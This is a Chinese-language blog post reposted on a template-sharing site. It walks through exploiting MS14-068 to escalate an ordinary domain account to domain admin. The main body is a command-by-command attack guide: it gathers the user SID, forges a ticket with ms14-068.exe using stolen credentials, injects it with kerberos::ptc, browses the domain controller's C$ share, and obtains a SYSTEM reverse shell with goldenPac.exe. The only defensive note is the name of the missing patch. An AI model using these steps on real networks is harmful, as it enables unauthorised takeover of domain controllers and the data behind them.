ms14-068漏洞

这篇具有很好参考价值的文章主要介绍了ms14-068漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

ms14-068漏洞

目录
  • ms14-068漏洞
    • 一、ms14-068漏洞介绍
    • 二、ms14-068漏洞利用条件
    • 三、ms14-068漏洞利用步骤
    • 四、利用goldenPac.exe工具

一、ms14-068漏洞介绍

ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。

二、ms14-068漏洞利用条件

1、获取域普通用户的账号密码

2、获取域普通用户的sid

3、服务器未打KB3011780补丁

三、ms14-068漏洞利用步骤

1、查看域用户的SID

whoami /all

2、清除内存中的票据

klist purge

3、通过ms14-068.exe生成票据

ms14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户SID -d 域控

4、导入票据到内存

kerberos::ptc 票据名字

5、测试是否成功(注意是机器名不是IP)

dir \\dc.candada.com\c$

6、可配合计划任务、服务或者PsExec工具上线

四、利用goldenPac.exe工具

它是MS14-068+psexec的组合,因此使用起来非常放方便快捷,一条命令可拿到system权限。

利用:

goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名

条件:

1、获取域普通用户的账号密码

2、获取域普通用户的sid

3、服务器未打KB3011780补丁

4、需要远程桌面(使用这个工具,运行了一条命令后,如果成功则会拿到一共反弹shell,CS没法用)文章来源地址https://www.toymoban.com/news/detail-479290.html

到了这里,关于ms14-068漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝(ms17010)漏洞利用

    目录 1.启动msf 2.检查msf库里是否存在ms17-010漏洞 3.扫描靶机开放端口 4.配置目标ip,本地ip并利用exploit进行攻击

    2024年02月11日
    浏览(42)
  • MS17-010 永恒之蓝漏洞利用方式

    Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux  192.168.109.130 目标靶机:windows7  192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描  发现目

    2024年02月09日
    浏览(40)
  • 主机漏洞利用演示MS17-010(永恒之蓝)

    ms17-010危害:对被攻击方的电脑造成蓝屏! 申明:本篇文章的用意仅做学习使用 网络搭建环境: 软件:Vmware Workstation 17 攻击机:Kali 靶机环境:Windows 7 Nmap软件的基本功能: 1、主机发现(Host Discovery) 2、端口扫描(Port Scanning) 3、版本侦测(Version Detection) 4、操作系统侦

    2024年02月15日
    浏览(40)
  • MS12-020漏洞利用-----蓝屏攻击(windows安全)

    靶机系统:windows server 2008 R2      ip:192.168.100.218 攻击机系统:linux-kali                ip:192.168.100.99 首先利用kali的nmap扫描攻击进行端口的扫描,判断是否有可利用的端口; 结果:     可以看到开启了3389端口,远程连接服务,那么便可以尝试蓝屏攻击,这是提前得

    2024年01月16日
    浏览(44)
  • Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)

    ●环境: 攻击机:Linux kali(IP:192.168.107.129) 靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143) 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的! ●永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病

    2024年02月11日
    浏览(39)
  • 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻

    2024年02月07日
    浏览(44)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(35)
  • 网络系统安全——MS15_034漏洞利用与安全加固

    Kali   192.168.124.162 Windows server 2008   192.168.124.169 检查2008服务器的IIS网站是否正常,进入2008服务器,使用ie浏览器访问本机地址 切换到kali,使用命令ping来测试他们的连通性 然后使用使用命令curl测试,测试:curl http://192.168.124.169 -H “Host:192.168.124.169” -H “Range:bytes=0-1844674

    2024年02月09日
    浏览(45)
  • 6-14漏洞利用-rpcbind漏洞利用

    rpcbind介绍 通俗的来说,rpcbind是NFS中用来进行消息通知的服务。 一般情况下rpcbind运行在111、31端口。并且NFS配置开启 rpcbind_enable=“YES” 我们来探测当前机器的开放端口,一般开启了rpcbind,会有nfs网络共享的功能,nfs端口是2049 探测目标rpcbind 使用nmap -sV -p 111 IP地址 探测目标

    2024年01月25日
    浏览(39)
  • 浅析ms17_010(永恒之蓝)漏洞利用过程及防护措施

    一、永恒之蓝(Wannacry)漏洞简介 1)一种“蠕虫式”的勒索病毒软件,利用windows的SMB漏洞传播,可以获取System最高权限; 2)主要对windows服务器、主机有较大影响;黑客利用病毒对电脑重要文件进行加密,索要高比特币,是一种常见的 “勒索病毒” ; 3)中国部分Windows操作系统

    2024年02月13日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包